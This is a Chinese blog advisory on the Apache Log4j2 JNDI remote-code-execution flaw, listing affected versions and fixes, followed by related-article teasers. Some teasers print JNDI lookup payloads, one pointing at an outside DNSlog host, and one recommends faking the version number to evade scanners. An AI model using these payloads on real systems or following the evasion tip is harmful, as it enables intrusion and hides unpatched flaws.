Apache Log4j2 RCE 命令执行漏洞预警及修复方案

最新推荐文章于 2023-07-27 11:03:59 发布
原创 最新推荐文章于 2023-07-27 11:03:59 发布 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #安全漏洞 #网络安全 #计算机网络

Apache Log4j2存在远程代码执行漏洞,影响2.0到2.15.0-rc1版本,允许攻击者无需授权即执行远程代码。此高危漏洞广泛影响中间件、开发框架和Web应用。建议立即升级到2.15.0-rc2或采取临时修复措施,如禁用Lookups功能。

漏洞名称:Apache Log4j2远程代码执行漏洞

组件名称:Apache Log4j2
截止2021年12⽉10⽇,受影响的Apache log4j2版本:
2.0≤Apache Log4j<=2.15.0-rc1

漏洞类型:远程代码执行

综合评价

<利用难度>:容易,无需授权即可远程代码执行。
<威胁等级>:高危,能造成远程代码执行。

漏洞详情

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。
由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,⽆需进⾏特殊配置,即可触发远程代码执⾏。

影响范围

Apache Log4j2广泛地应用在中间件、开发框架、Web应用中。漏洞危害性高,涉及用户量较大,导致漏洞影响力巨大。
截止2021年12⽉10日,受影响的Apache log4j2版本:
2.0 <= Apache log4j2 <= 2.15.0-rc1

受影响的Java框架
在这里插入图片描述

【点击获取学习资料】

  • 渗透工具
最低0.47元/天 解锁文章
漏洞复现】Apache Log4j2 远程代码执行漏洞
李同學的安全圈
07-20 1250
ApacheLog4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。......
Apache Log4j2 RCE漏洞利用反弹shell合集
渗透之路,攻防之间皆学问
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
Log4j漏洞不仅仅是修复,更需要构建有效预警机制
数据库技术
12-15 3984
软件的漏洞有时不可避免,根据Gartner的相关统计,到 2025 年,30% 的关键信息基础设施组织将遇到安全漏洞。日志服务SLS,可帮助快速部署一个预警机制,使得漏洞被利用时可以快速发现并及时响应。通过使用阿里云日志服务SLS,只需两步即可完成攻击检测。
Apache_Log4j2_RCE漏洞复现(CVE-2021-44228)
qq_45751902的博客
10-05 1079
这就为攻击者提供了攻击途径,攻击者可以在界面传入一个包含恶意内容(会提供一个恶意的Class文件)的ldap协议内容(如:恶意内容${jndi:ldap://localhost:{sys:java.version}}恶意内容),该内容传递到后端被log4j2打印出来,就会触发恶意的Class的加载执行(可执行任意后台指令),从而达到攻击的目的。是最受欢迎的于开发时的日志组件。不知道为什么,上面申请的那个url,没有返回数据,然后也ping不通(如果你还没有回显,看图片下面),看下面的图片,说明存在漏洞
Log4j2_RCE漏洞复现
kukudeshuo的博客
12-20 2047
Log4j2_RCE漏洞复现 题目地址 https://ctf.bugku.com/challenges/detail/id/340.html 复现过程 首先这里需要一台外网VPS服务器,然后在上面安装JNDI注入工具 打开题目 先使用dnslog进行测试 ${jndi:ldap://2c7b25a4.xxxxx.ceye.io/exp} 填在账号输入的位置即可,密码随便填 然后点击提交 可以看到笔者这边的dnslog平台成功返回一条记录,说明存在Log4j2_RCE漏洞 开启ldap和http服务
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 2万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
漏洞预警Apache Log4j RCE漏洞
热门推荐
土豆的博客
12-13 7万+
目录 Part1 漏洞描述 Part2 危害等级 Part3 漏洞影响 Part4 漏洞分析及验证 源码分析 Part5 漏洞检测 自我检测 攻击检测 产品检测 Part6 漏洞修复 Part1 漏洞描述 Apache Log4jApache的一个开源项目,Apache log4j2Log4j的升级版本,我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 近日发现Apache Log4j存在任意代码执行
Apache Log4j 2 远程代码执行漏洞详解
SimpleAstronaut的博客
12-11 1万+
Apache Log4j2 远程代码执行漏洞的详细信息已被披露,而经过分析,本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。
代码审计-log4j2_rce分析
cdyunaq的博客
12-14 1282
前言 20211124日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞202112月9日晚,各大公众号突然发布漏洞预警 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞
Apache Log4j2.x RCE命令执行漏洞攻击原理及修复措施
wangpf2011的博客
12-23 4137
截止2021.12.20,短短几天Log4j2.x已经连发3个版本,用以修复RCE命令执行漏洞Log4j2漏洞总体来说是通过JNDI注入恶意代码来完成攻击,具体的操作方式有RMI和LDAP等。 一、攻击原理 以RMI为例,简单阐述下该漏洞的攻击原理: 1、攻击者首先发布一个RMI服务,此服务将绑定一个引用类型的RMI对象。在引用对象中指定一个远程的含有恶意代码的类。 2、攻击者再发布另一个恶意代码下载服务,此服务可以下载所有含有恶意代码的类。 3、攻击者利用Log4j2漏洞注入RMI调用,
log4j代码审计及修复方法
liguangyao213的博客
04-06 1826
log4j反序列化审计及修复本项目引入的Log4j版本2.10.02.0\x26lt;log4j\x26lt;2.14.1 存在CVE-2021-44228漏https://mp.weixin.qq.com/s?__biz=MzI1ODY3MTA3Nw==&mid=2247484178&idx=1&sn=d66b1fd28928084917c81d4ec92ff6bb&chksm=ea05eb98dd72628e24e82d9c30038bb9db4286ad54a1e14
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
Apache_Log4j2_RCE漏洞复现
Nailaoyyds的博客
04-24 4429
漏洞描述: Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x < 2.15.0-rc2 利用bugku中的题来
log4j漏洞log4j 1.x漏洞依赖包解决方案
你的博客
05-05 4557
那么自己的程序中确定是没有引用了,那log4j的引用必定是程序中的第三方依赖包了。如果觉得上面办法比较麻烦,也并不适合自己的场景,还有一个办法,这个办法只能躲过扫描,并未实际解决log4j漏洞问题,那就是将引入的log4j 1.2.17的包中的版本去改掉,直接修改配置中的版本号,就能躲过扫描。对于应用中我们自己写的程序全部替换为新版本。考虑了很久,某时灵光一闪,既然没有log4j的引用类,那么就在程序中创建这些类吧,这样log4j的几个自定义类仍然可以被其他包引用,而应用中又不需要引用log4j的原始包。
log4j2远程代码执行RCE漏洞复现(CVE-2021-44228)
m0_57379855的博客
03-06 794
RCE远程代码执行漏洞复现log4jLog4jLDAPJNDIJNDI注入漏洞流程Log4j影响范围和排查方法修复漏洞 Log4j Log for Java,Apach的开源日志记录组件,使用非常广泛 使用方法: 1.pom引入依赖 2.获得logger实例 3.logger.info() debug() error() warn() LDAP lightweight directory access protocol轻量级目录访问协议(目录服务)默认端口389 可以批量登录 JNDI LDAP目录服务,R
log4j2漏洞升级
magic_kid_2010的专栏
12-17 7546
一、影响范围: Apache Log4j 2.x <= 2.15.0-rc1 二、可能受影响的应用不限于以下内容: Spring-Boot-strater-log4j2 Apache Struts2 Apache Solr Apache Druid Apache Flink ElasticSearch Flume Dubbo Jedis Logstash Kafka Apache Storm 三、解决办法: 1、等待官方升级 log4j2 版本2、自己升级 log
分析Apache Log4j2 远程代码执行漏洞
ordersyhack
02-04 1万+
分析Apache Log4j2 远程代码执行漏洞
CVE-2021-44228-Apache-Log4j-Rce漏洞反弹win&linux
渗透测试研究中心
12-14 665
0x00 漏洞描述Apache Log4jApache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。Log4j-2中存在JND...
Log4j2漏洞修复
derstsea的专栏
12-14 1万+
一、漏洞说明 Apache Log4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2Apache Solr、Apache Druid、Apache Flink等均受影响。 漏洞适用版本2.0 <= Apache log4j2 <= 2.14.1,只需检测Java应用是否引入 log4j-api , log4j-core 两个j
Apache Log4j 2.16.0远程代码执行漏洞紧急修复升级
资源摘要信息:"Apache Log4j 2.16.0版本是一个重要的安全更新版本,该版本针对之前版本中存在的一个严重的远程代码执行(RCE漏洞进行了修复Apache Log4j是一个广泛使用的Java日志记录库,该库被大量应用程序用于...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值